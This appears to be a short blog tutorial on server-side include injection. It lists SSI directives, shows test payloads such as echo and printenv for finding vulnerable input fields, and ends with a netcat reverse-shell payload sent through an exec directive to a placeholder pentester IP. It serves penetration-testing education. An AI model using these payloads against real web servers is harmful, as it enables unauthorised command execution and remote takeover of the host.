SSI Injection In web applications with a (exploitation example)

ADIP
3 min readMar 23, 2024

--

Server-side includes (SSI) is a technology used by web applications to create dynamic content on HTML pages before loading or during the rendering process by evaluating SSI directives. Some SSI directives are:

// Date
<!--#echo var="DATE_LOCAL" -->

// Modification date of a file
<!--#flastmod file="index.html" -->

// CGI Program results
<!--#include virtual="/cgi-bin/counter.pl" -->

// Including a footer
<!--#include virtual="/footer.html" -->

// Executing commands
<!--#exec cmd="ls" -->

// Setting variables
<!--#set var="name" value="Rich" -->

// Including virtual files (same directory)
<!--#include virtual="file_to_include.html" -->

// Including files (same directory)
<!--#include file="file_to_include.html" -->

// Print all variables
<!--#printenv -->

The use of SSI on a web application can be identified by checking for extensions such as .shtml, .shtm, or .stm. That said, non-default server configurations exist that could allow other extensions (such as .html) to process SSI directives.

We need to submit payloads to the target application, such as the ones mentioned above, through input fields to test for SSI injection. The web server will parse and execute the directives before rendering the page if a vulnerability is present, but be aware that those vulnerabilities can exist in blind format too. Successful SSI injection can lead to extracting sensitive information from local files or even executing commands on the target web server.

So this is our target website:

Let us focus on identifying an SSI Injection vulnerability by submitting some of the SSI directives

1. <!--#echo var="DATE_LOCAL" -->
2. <!--#printenv -->

Date

All Variables

As we can see, the application is indeed vulnerable to SSI Injection!

Reverse Shell

<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->
  • mkfifo /tmp/foo: Create a FIFO special file in /tmp/foo
  • nc <IP> <PORT> 0</tmp/foo: Connect to the pentester machine and redirect the standard input descriptor
  • | bin/bash 1>/tmp/foo: Execute /bin/bash redirecting the standard output descriptor to /tmp/foo
  • rm /tmp/foo: Cleanup the FIFO file

--

--

ADIP

Offensive Security Researcher | OSWE | eMAPT | GCPN